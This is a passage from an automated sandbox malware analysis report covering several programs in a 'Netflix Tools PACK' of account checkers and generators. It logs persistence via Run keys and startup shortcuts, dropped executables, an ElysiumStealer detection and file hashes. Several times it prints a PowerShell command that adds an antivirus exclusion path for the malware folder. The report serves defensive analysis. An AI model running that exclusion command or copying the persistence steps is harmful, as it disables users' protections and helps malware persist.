| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker v1 by Sh4lltear\sysdll\Launcher.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker v1 by Sh4lltear\sysdll\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker v1 by Sh4lltear\sysdll\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath C:\Windows\IMF\
C:\Windows\IMF\Windows Services.exe
"C:\Windows\IMF\Windows Services.exe" {Arguments If Needed}
C:\Windows\IMF\Secure System Shell.exe
"C:\Windows\IMF\Secure System Shell.exe"
C:\Windows\IMF\Runtime Explorer.exe
"C:\Windows\IMF\Runtime Explorer.exe"
Network
| Country | Destination | Domain | Proto |
| US | 209.197.3.8:80 | | tcp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ma34tkqd.eb5.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
Analysis: behavioral26
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
Platform
win10v2004-20230621-en
Max time kernel
40s
Max time network
47s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker v1 by Sh4lltear\sysdll\wscadminui.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker v1 by Sh4lltear\sysdll\wscadminui.exe"
Network
| Country | Destination | Domain | Proto |
| IE | 20.190.159.75:443 | | tcp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.220.44.20.in-addr.arpa | udp |
| NL | 8.238.177.254:80 | | tcp |
| NL | 8.238.177.254:80 | | tcp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.103.197.20.in-addr.arpa | udp |
| GB | 51.132.193.105:443 | | tcp |
| US | 8.8.8.8:53 | 177.17.30.184.in-addr.arpa | udp |
Files
Analysis: behavioral22
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
Platform
win10v2004-20230621-en
Max time kernel
26s
Max time network
35s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2178924671-3779044592-2825503497-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker V3.1 by Cetrix\sysdll\Launcher.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2178924671-3779044592-2825503497-1000\Control Panel\International\Geo\Nation | C:\Windows\IMF\Windows Services.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Startup.lnk | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker V3.1 by Cetrix\sysdll\Launcher.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2178924671-3779044592-2825503497-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Explorer = "C:\\Windows\\IMF\\\\Windows Services.exe" | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker V3.1 by Cetrix\sysdll\Launcher.exe | N/A |
Drops file in Windows directory
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker V3.1 by Cetrix\sysdll\Launcher.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker V3.1 by Cetrix\sysdll\Launcher.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker V3.1 by Cetrix\sysdll\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker V3.1 by Cetrix\sysdll\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath C:\Windows\IMF\
C:\Windows\IMF\Windows Services.exe
"C:\Windows\IMF\Windows Services.exe" {Arguments If Needed}
C:\Windows\IMF\Secure System Shell.exe
"C:\Windows\IMF\Secure System Shell.exe"
C:\Windows\IMF\Runtime Explorer.exe
"C:\Windows\IMF\Runtime Explorer.exe"
Network
| Country | Destination | Domain | Proto |
| US | 20.189.173.12:443 | | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_woh0lcsi.vlq.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
Analysis: behavioral25
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
Platform
win10v2004-20230621-en
Max time kernel
18s
Max time network
21s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker v1 by Sh4lltear\sysdll\Sh4lltear.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker v1 by Sh4lltear\sysdll\Sh4lltear.exe"
Network
Files
Analysis: behavioral15
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
Platform
win10v2004-20230621-en
Max time kernel
24s
Max time network
16s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2178924671-3779044592-2825503497-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\Launcher.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2178924671-3779044592-2825503497-1000\Control Panel\International\Geo\Nation | C:\Windows\IMF\Windows Services.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Startup.lnk | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\Launcher.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2178924671-3779044592-2825503497-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Explorer = "C:\\Windows\\IMF\\\\Windows Services.exe" | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\Launcher.exe | N/A |
Drops file in Windows directory
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\Launcher.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\Launcher.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath C:\Windows\IMF\
C:\Windows\IMF\Windows Services.exe
"C:\Windows\IMF\Windows Services.exe" {Arguments If Needed}
C:\Windows\IMF\Secure System Shell.exe
"C:\Windows\IMF\Secure System Shell.exe"
C:\Windows\IMF\Runtime Explorer.exe
"C:\Windows\IMF\Runtime Explorer.exe"
Network
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ujoxm4k5.agu.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
Analysis: behavioral17
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
Platform
win10v2004-20230621-en
Max time kernel
33s
Max time network
17s
Command Line
Signatures
ElysiumStealer
ElysiumStealer Support DLL
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4025927695-1301755775-2607443251-1000\Control Panel\International\Geo\Nation | C:\Windows\IMF\Windows Services.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4025927695-1301755775-2607443251-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\NetFlix_Shitter_V3.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Startup.lnk | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\Launcher.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\Shitter 3.0.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4025927695-1301755775-2607443251-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Explorer = "C:\\Windows\\IMF\\\\Windows Services.exe" | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\Launcher.exe | N/A |
Drops file in Windows directory
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\Shitter 3.0.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\Launcher.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\Launcher.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\Shitter 3.0.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\NetFlix_Shitter_V3.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\NetFlix_Shitter_V3.exe"
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath C:\Windows\IMF\
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\Shitter 3.0.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\Shitter 3.0.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5024 -ip 5024
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5024 -s 1092
C:\Windows\IMF\Windows Services.exe
"C:\Windows\IMF\Windows Services.exe" {Arguments If Needed}
C:\Windows\IMF\Secure System Shell.exe
"C:\Windows\IMF\Secure System Shell.exe"
C:\Windows\IMF\Runtime Explorer.exe
"C:\Windows\IMF\Runtime Explorer.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 254.5.248.8.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\Runtime.MSIL.1.0.0.0\NativePRo.dll
| MD5 | 94173de2e35aa8d621fc1c4f54b2a082 |
| SHA1 | fbb2266ee47f88462560f0370edb329554cd5869 |
| SHA256 | 7e2c70b7732fb1a9a61d7ce3d7290bc7b31ea28cbfb1dbc79d377835615b941f |
| SHA512 | cadbf4db0417283a02febbabd337bf17b254a6eb6e771f8a553a140dd2b04efd0672b1f3175c044a3edd0a911ce59d6695f765555262560925f3159bb8f3b798 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lycggo3h.uox.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
Analysis: behavioral20
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
Platform
win10v2004-20230621-en
Max time kernel
33s
Max time network
28s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\ttdinject.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\ttdinject.exe"
Network
| Country | Destination | Domain | Proto |
| US | 93.184.221.240:80 | | tcp |
| US | 93.184.221.240:80 | | tcp |
Files
Analysis: behavioral28
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
Platform
win10v2004-20230621-en
Max time kernel
32s
Max time network
28s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4025927695-1301755775-2607443251-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix GC Generator By SpaceXVIII\Gen\Launcher.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4025927695-1301755775-2607443251-1000\Control Panel\International\Geo\Nation | C:\Windows\IMF\Windows Services.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Startup.lnk | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix GC Generator By SpaceXVIII\Gen\Launcher.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4025927695-1301755775-2607443251-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Explorer = "C:\\Windows\\IMF\\\\Windows Services.exe" | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix GC Generator By SpaceXVIII\Gen\Launcher.exe | N/A |
Drops file in Windows directory
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix GC Generator By SpaceXVIII\Gen\Launcher.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix GC Generator By SpaceXVIII\Gen\Launcher.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
